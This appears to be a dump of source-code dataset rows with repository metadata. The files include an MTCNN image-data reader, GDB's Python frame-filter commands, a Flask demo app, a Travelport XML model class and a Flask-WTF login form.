oid sha256:4cc44e1f399e417bbb303f11e4f98452ec119f4f4a6763df9751bd47db29ba4e
size 679
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
a80b1f52ed5144212414ad8969adc627bb1ce950
|
17900afc933c192e6ce921c24fa0488a3ac98e6d
|
/reader_o_net.py
|
5d3c1fbbab79101e8ba855b7f1068caa51c95dad
|
[] |
no_license
|
JesseYang/MTCNN
|
210eb9223eb03b8044a0d22b4372aad376e45ccd
|
3ff697442181a16aad858433bcfee77a7012fd4a
|
refs/heads/master
| 2021-01-21T08:20:55.354279
| 2018-01-02T14:28:07
| 2018-01-02T14:28:07
| 101,959,647
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,609
|
py
|
import os, sys
import pdb
import pickle
import numpy as np
from scipy import misc
import random
import six
from six.moves import urllib, range
import copy
import logging
import cv2
from tensorpack import *
from cfgs.config import cfg
def get_img_list(text_file):
with open(text_file) as f:
content = f.readlines()
ret = [record.strip().split(' ') for record in content]
# pdb.set_trace()
filter_ret = []
for idx, ele in enumerate(ret):
im_path = ele[0]
# print(im_path)
if int(ele[1]) == -1:
flage = -1
if len(ele[2:]) < 7:
label = np.asarray([float(e) for e in ele[2: ]])
landmark = np.asarray([float(0) for e in range(0,10)])
else:
label = np.asarray([float(e) for e in ele[2:6]])
landmark = np.asarray([float(e) for e in ele[6: ]])
elif int(ele[1]) == 1:
flage = 1
if len(ele[2:]) < 7:
label = np.asarray([float(e) for e in ele[2: ]])
landmark = np.asarray([float(0) for e in range(0,10)])
else:
label = np.asarray([float(e) for e in ele[2:6]])
landmark = np.asarray([float(e) for e in ele[6: ]])
elif int(ele[1]) == 0:
flage = 0
label = np.asarray([float(0) for e in range(0,4)])
landmark = np.asarray([float(0) for e in range(0,10)])
filter_ret.append([im_path, flage, label, landmark])
return filter_ret
class Data(RNGDataFlow):
def __init__(self, filename_list, shuffle=True):
self.filename_list = filename_list
if isinstance(filename_list, list) == False:
filename_list = [filename_list]
self.imglist = []
for filename in filename_list:
self.imglist.extend(get_img_list(filename))
self.shuffle = shuffle
def size(self):
return len(self.imglist)
def get_data(self):
idxs = np.arange(len(self.imglist))
if self.shuffle:
self.rng.shuffle(idxs)
for k in idxs:
img_path, label, bbox, landmark = self.imglist[k]
if not os.path.isfile(img_path):
continue
img = misc.imread(img_path, mode='RGB')
# print(landmark)
img = cv2.resize(img, (cfg.img_size_48, cfg.img_size_48))
yield [img, label, bbox, landmark]
if __name__ == '__main__':
ds = Data(cfg.train_list)
# ds.reset_state()
# g = ds.get_data()
# dp = next(g)
# import pdb
# pdb.set_trace()
|
[
"jesse.yang1985@gmail.com"
] |
jesse.yang1985@gmail.com
|
786379d4c59694fe1c9f96f5d1cd36d9be7f5792
|
55540f3e86f1d5d86ef6b5d295a63518e274efe3
|
/toolchain/riscv/Darwin/share/gdb/python/gdb/command/frame_filters.py
|
fd7498fd144731c099fc14fc38755f8fb21e2f32
|
[
"Apache-2.0"
] |
permissive
|
bouffalolab/bl_iot_sdk
|
bc5eaf036b70f8c65dd389439062b169f8d09daa
|
b90664de0bd4c1897a9f1f5d9e360a9631d38b34
|
refs/heads/master
| 2023-08-31T03:38:03.369853
| 2023-08-16T08:50:33
| 2023-08-18T09:13:27
| 307,347,250
| 244
| 101
|
Apache-2.0
| 2023-08-28T06:29:02
| 2020-10-26T11:16:30
|
C
|
UTF-8
|
Python
| false
| false
| 16,256
|
py
|
# Frame-filter commands.
# Copyright (C) 2013-2020 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""GDB commands for working with frame-filters."""
import sys
import gdb
import copy
from gdb.FrameIterator import FrameIterator
from gdb.FrameDecorator import FrameDecorator
import gdb.frames
import itertools
# GDB Commands.
class SetFilterPrefixCmd(gdb.Command):
"""Prefix command for 'set' frame-filter related operations."""
def __init__(self):
super(SetFilterPrefixCmd, self).__init__("set frame-filter",
gdb.COMMAND_OBSCURE,
gdb.COMPLETE_NONE, True)
class ShowFilterPrefixCmd(gdb.Command):
"""Prefix command for 'show' frame-filter related operations."""
def __init__(self):
super(ShowFilterPrefixCmd, self).__init__("show frame-filter",
gdb.COMMAND_OBSCURE,
gdb.COMPLETE_NONE, True)
class InfoFrameFilter(gdb.Command):
"""List all registered Python frame-filters.
Usage: info frame-filters"""
def __init__(self):
super(InfoFrameFilter, self).__init__("info frame-filter",
gdb.COMMAND_DATA)
@staticmethod
def enabled_string(state):
"""Return "Yes" if filter is enabled, otherwise "No"."""
if state:
return "Yes"
else:
return "No"
def print_list(self, title, frame_filters, blank_line):
sorted_frame_filters = sorted(frame_filters.items(),
key=lambda i: gdb.frames.get_priority(i[1]),
reverse=True)
if len(sorted_frame_filters) == 0:
return 0
print(title)
print(" Priority Enabled Name")
for frame_filter in sorted_frame_filters:
name = frame_filter[0]
try:
priority = '{:<8}'.format(
str(gdb.frames.get_priority(frame_filter[1])))
enabled = '{:<7}'.format(
self.enabled_string(gdb.frames.get_enabled(frame_filter[1])))
print(" %s %s %s" % (priority, enabled, name))
except Exception:
e = sys.exc_info()[1]
print(" Error printing filter '"+name+"': "+str(e))
if blank_line:
print("")
return 1
def invoke(self, arg, from_tty):
any_printed = self.print_list("global frame-filters:", gdb.frame_filters, True)
cp = gdb.current_progspace()
any_printed += self.print_list("progspace %s frame-filters:" % cp.filename,
cp.frame_filters, True)
for objfile in gdb.objfiles():
any_printed += self.print_list("objfile %s frame-filters:" % objfile.filename,
objfile.frame_filters, False)
if any_printed == 0:
print ("No frame filters.")
# Internal enable/disable functions.
def _enable_parse_arg(cmd_name, arg):
""" Internal worker function to take an argument from
enable/disable and return a tuple of arguments.
Arguments:
cmd_name: Name of the command invoking this function.
args: The argument as a string.
Returns:
A tuple containing the dictionary, and the argument, or just
the dictionary in the case of "all".
"""
argv = gdb.string_to_argv(arg);
argc = len(argv)
if argc == 0:
raise gdb.GdbError(cmd_name + " requires an argument")
if argv[0] == "all":
if argc > 1:
raise gdb.GdbError(cmd_name + ": with 'all' " \
"you may not specify a filter.")
elif argc != 2:
raise gdb.GdbError(cmd_name + " takes exactly two arguments.")
return argv
def _do_enable_frame_filter(command_tuple, flag):
"""Worker for enabling/disabling frame_filters.
Arguments:
command_type: A tuple with the first element being the
frame filter dictionary, and the second being
the frame filter name.
flag: True for Enable, False for Disable.
"""
list_op = command_tuple[0]
op_list = gdb.frames.return_list(list_op)
if list_op == "all":
for item in op_list:
gdb.frames.set_enabled(item, flag)
else:
frame_filter = command_tuple[1]
try:
ff = op_list[frame_filter]
except KeyError:
msg = "frame-filter '" + str(frame_filter) + "' not found."
raise gdb.GdbError(msg)
gdb.frames.set_enabled(ff, flag)
def _complete_frame_filter_list(text, word, all_flag):
"""Worker for frame filter dictionary name completion.
Arguments:
text: The full text of the command line.
word: The most recent word of the command line.
all_flag: Whether to include the word "all" in completion.
Returns:
A list of suggested frame filter dictionary name completions
from text/word analysis. This list can be empty when there
are no suggestions for completion.
"""
if all_flag == True:
filter_locations = ["all", "global", "progspace"]
else:
filter_locations = ["global", "progspace"]
for objfile in gdb.objfiles():
filter_locations.append(objfile.filename)
# If the user just asked for completions with no completion
# hints, just return all the frame filter dictionaries we know
# about.
if (text == ""):
return filter_locations
# Otherwise filter on what we know.
flist = filter(lambda x,y=text:x.startswith(y), filter_locations)
# If we only have one completion, complete it and return it.
if len(flist) == 1:
flist[0] = flist[0][len(text)-len(word):]
# Otherwise, return an empty list, or a list of frame filter
# dictionaries that the previous filter operation returned.
return flist
def _complete_frame_filter_name(word, printer_dict):
"""Worker for frame filter name completion.
Arguments:
word: The most recent word of the command line.
printer_dict: The frame filter dictionary to search for frame
filter name completions.
Returns: A list of suggested frame filter name completions
from word analysis of the frame filter dictionary. This list
can be empty when there are no suggestions for completion.
"""
printer_keys = printer_dict.keys()
if (word == ""):
return printer_keys
flist = filter(lambda x,y=word:x.startswith(y), printer_keys)
return flist
class EnableFrameFilter(gdb.Command):
"""GDB command to enable the specified frame-filter.
Usage: enable frame-filter DICTIONARY [NAME]
DICTIONARY is the name of the frame filter dictionary on which to
operate. If dictionary is set to "all", perform operations on all
dictionaries. Named dictionaries are: "global" for the global
frame filter dictionary, "progspace" for the program space's frame
filter dictionary. If either all, or the two named dictionaries
are not specified, the dictionary name is assumed to be the name
of an "objfile" -- a shared library or an executable.
NAME matches the name of the frame-filter to operate on."""
def __init__(self):
super(EnableFrameFilter, self).__init__("enable frame-filter",
gdb.COMMAND_DATA)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, True)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = _enable_parse_arg("enable frame-filter", arg)
_do_enable_frame_filter(command_tuple, True)
class DisableFrameFilter(gdb.Command):
"""GDB command to disable the specified frame-filter.
Usage: disable frame-filter DICTIONARY [NAME]
DICTIONARY is the name of the frame filter dictionary on which to
operate. If dictionary is set to "all", perform operations on all
dictionaries. Named dictionaries are: "global" for the global
frame filter dictionary, "progspace" for the program space's frame
filter dictionary. If either all, or the two named dictionaries
are not specified, the dictionary name is assumed to be the name
of an "objfile" -- a shared library or an executable.
NAME matches the name of the frame-filter to operate on."""
def __init__(self):
super(DisableFrameFilter, self).__init__("disable frame-filter",
gdb.COMMAND_DATA)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, True)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = _enable_parse_arg("disable frame-filter", arg)
_do_enable_frame_filter(command_tuple, False)
class SetFrameFilterPriority(gdb.Command):
"""GDB command to set the priority of the specified frame-filter.
Usage: set frame-filter priority DICTIONARY NAME PRIORITY
DICTIONARY is the name of the frame filter dictionary on which to
operate. Named dictionaries are: "global" for the global frame
filter dictionary, "progspace" for the program space's framefilter
dictionary. If either of these two are not specified, the
dictionary name is assumed to be the name of an "objfile" -- a
shared library or an executable.
NAME matches the name of the frame filter to operate on.
PRIORITY is the an integer to assign the new priority to the frame
filter."""
def __init__(self):
super(SetFrameFilterPriority, self).__init__("set frame-filter " \
"priority",
gdb.COMMAND_DATA)
def _parse_pri_arg(self, arg):
"""Internal worker to parse a priority from a tuple.
Arguments:
arg: Tuple which contains the arguments from the command.
Returns:
A tuple containing the dictionary, name and priority from
the arguments.
Raises:
gdb.GdbError: An error parsing the arguments.
"""
argv = gdb.string_to_argv(arg);
argc = len(argv)
if argc != 3:
print("set frame-filter priority " \
"takes exactly three arguments.")
return None
return argv
def _set_filter_priority(self, command_tuple):
"""Internal worker for setting priority of frame-filters, by
parsing a tuple and calling _set_priority with the parsed
tuple.
Arguments:
command_tuple: Tuple which contains the arguments from the
command.
"""
list_op = command_tuple[0]
frame_filter = command_tuple[1]
# GDB returns arguments as a string, so convert priority to
# a number.
priority = int(command_tuple[2])
op_list = gdb.frames.return_list(list_op)
try:
ff = op_list[frame_filter]
except KeyError:
msg = "frame-filter '" + str(frame_filter) + "' not found."
raise gdb.GdbError(msg)
gdb.frames.set_priority(ff, priority)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, False)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = self._parse_pri_arg(arg)
if command_tuple != None:
self._set_filter_priority(command_tuple)
class ShowFrameFilterPriority(gdb.Command):
"""GDB command to show the priority of the specified frame-filter.
Usage: show frame-filter priority DICTIONARY NAME
DICTIONARY is the name of the frame filter dictionary on which to
operate. Named dictionaries are: "global" for the global frame
filter dictionary, "progspace" for the program space's framefilter
dictionary. If either of these two are not specified, the
dictionary name is assumed to be the name of an "objfile" -- a
shared library or an executable.
NAME matches the name of the frame-filter to operate on."""
def __init__(self):
super(ShowFrameFilterPriority, self).__init__("show frame-filter " \
"priority",
gdb.COMMAND_DATA)
def _parse_pri_arg(self, arg):
"""Internal worker to parse a dictionary and name from a
tuple.
Arguments:
arg: Tuple which contains the arguments from the command.
Returns:
A tuple containing the dictionary, and frame filter name.
Raises:
gdb.GdbError: An error parsing the arguments.
"""
argv = gdb.string_to_argv(arg);
argc = len(argv)
if argc != 2:
print("show frame-filter priority " \
"takes exactly two arguments.")
return None
return argv
def get_filter_priority(self, frame_filters, name):
"""Worker for retrieving the priority of frame_filters.
Arguments:
frame_filters: Name of frame filter dictionary.
name: object to select printers.
Returns:
The priority of the frame filter.
Raises:
gdb.GdbError: A frame filter cannot be found.
"""
op_list = gdb.frames.return_list(frame_filters)
try:
ff = op_list[name]
except KeyError:
msg = "frame-filter '" + str(name) + "' not found."
raise gdb.GdbError(msg)
return gdb.frames.get_priority(ff)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, False)
else:
printer_list = frame._return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = self._parse_pri_arg(arg)
if command_tuple == None:
return
filter_name = command_tuple[1]
list_name = command_tuple[0]
try:
priority = self.get_filter_priority(list_name, filter_name);
except Exception:
e = sys.exc_info()[1]
print("Error printing filter priority for '"+name+"':"+str(e))
else:
print("Priority of filter '" + filter_name + "' in list '" \
+ list_name + "' is: " + str(priority))
# Register commands
SetFilterPrefixCmd()
ShowFilterPrefixCmd()
InfoFrameFilter()
EnableFrameFilter()
DisableFrameFilter()
SetFrameFilterPriority()
ShowFrameFilterPriority()
|
[
"jczhang@bouffalolab.com"
] |
jczhang@bouffalolab.com
|
9589822d526ae5e14200c84b3998d7219995c189
|
783f6e7f10bc1b78c5d79f67db2cc083afdbc651
|
/flask_task/day01flask简介/预习/day41_flask(原来上课代码大家可以参考和上面的笔记)/app2.py
|
2cf3f5177ce4a38b067c17b47313548207223ea2
|
[] |
no_license
|
GoodPhilipShi/flask_test
|
da72886f095a1af2588697966ea68069bb3e123c
|
e6399f1364adbc2c19e9395efe33fb3dd1262e99
|
refs/heads/master
| 2023-03-27T01:43:20.834175
| 2020-08-07T08:59:40
| 2020-08-07T08:59:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 516
|
py
|
from flask import Flask
# 创建flask对象
app = Flask(__name__)
app.config.from_pyfile('settings.py')
# 路由+视图函数
@app.route('/')
def hello_world(): # ---->视图函数
return 'HELLO hello world!hello kitty!'
@app.route('/abc',endpoint='abc1')
def show_abc():
return '<h1>abc</h1>'
# route就是将函数与add_url_rule进行了装饰
def show_name():
return '千锋教育'
app.add_url_rule('/name', view_func=show_name)
if __name__ == '__main__':
# 启动flask
app.run()
|
[
"jasonboy0526@gmail.com"
] |
jasonboy0526@gmail.com
|
0111022712207e73557db11daa4c215b62aa68f5
|
9edaf93c833ba90ae9a903aa3c44c407a7e55198
|
/travelport/models/provider_reservation_status.py
|
e289bb70dc7b7eab923ad8cfe1af2b88069fce75
|
[] |
no_license
|
tefra/xsdata-samples
|
c50aab4828b8c7c4448dbdab9c67d1ebc519e292
|
ef027fe02e6a075d8ed676c86a80e9647d944571
|
refs/heads/main
| 2023-08-14T10:31:12.152696
| 2023-07-25T18:01:22
| 2023-07-25T18:01:22
| 222,543,692
| 6
| 1
| null | 2023-06-25T07:21:04
| 2019-11-18T21:00:37
|
Python
|
UTF-8
|
Python
| false
| false
| 2,532
|
py
|
from __future__ import annotations
from dataclasses import dataclass, field
from xsdata.models.datatype import XmlDate, XmlDateTime
from travelport.models.type_result_message_1 import TypeResultMessage1
__NAMESPACE__ = "http://www.travelport.com/schema/universal_v52_0"
@dataclass
class ProviderReservationStatus:
"""
Status of the cancellation for this provider reservation.
Parameters
----------
cancel_info
If the provider reservation was not successfully cancelled or
cancelled with warnings the provider system might provides some
textual information describing the reason.
create_date
The date and time that this reservation was created.
modified_date
The date and time that this reservation was last modified for any
reason.
provider_code
Contains the Provider Code of the entity housing the actual
reservation in the event this is a passive one.
locator_code
Contains the Locator Code of the actual reservation in the event
this is a passive reservation.
cancelled
Will be true if the reservation was successfuly cancelled on the
provider system.
"""
class Meta:
namespace = "http://www.travelport.com/schema/universal_v52_0"
cancel_info: None | TypeResultMessage1 = field(
default=None,
metadata={
"name": "CancelInfo",
"type": "Element",
}
)
create_date: None | XmlDateTime = field(
default=None,
metadata={
"name": "CreateDate",
"type": "Attribute",
"required": True,
}
)
modified_date: None | XmlDateTime = field(
default=None,
metadata={
"name": "ModifiedDate",
"type": "Attribute",
"required": True,
}
)
provider_code: None | str = field(
default=None,
metadata={
"name": "ProviderCode",
"type": "Attribute",
"required": True,
"min_length": 2,
"max_length": 5,
}
)
locator_code: None | str = field(
default=None,
metadata={
"name": "LocatorCode",
"type": "Attribute",
"required": True,
"max_length": 15,
}
)
cancelled: None | bool = field(
default=None,
metadata={
"name": "Cancelled",
"type": "Attribute",
"required": True,
}
)
|
[
"chris@komposta.net"
] |
chris@komposta.net
|
6d2d12eec92a60acc5c530dee543f444ce6775e6
|
ef7a7397c1f3b07e48619c67f06016cdafd44ee0
|
/services/resources/sion/form.py
|
16e719e6aed2714e4c0e5f63526c0f8915207371
|
[] |
no_license
|
komangsu/sion-automation
|
a5ec4931fd8a08975e2d24d38b2723b0927a9b8f
|
14087311c1045518ce9efcc67ac26642a682da48
|
refs/heads/master
| 2022-06-10T14:43:59.745367
| 2020-05-07T05:44:31
| 2020-05-07T05:44:31
| 261,810,790
| 0
| 0
| null | 2020-05-06T16:03:23
| 2020-05-06T16:03:22
| null |
UTF-8
|
Python
| false
| false
| 496
|
py
|
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, RadioField
from wtforms.validators import DataRequired, Length
class SionForm(FlaskForm):
nim = StringField('Nim',validators=[DataRequired(),Length(min=3,max=10)])
password = PasswordField('Password',validators=[DataRequired(),Length(min=3)])
harapan = RadioField("Harapan untuk semua matkul ?",choices=[('1','1'),('1','-1')],validators=[DataRequired()])
submit = SubmitField('Submit')
|
[
"nyomanpradipta120@gmail.com"
] |
nyomanpradipta120@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.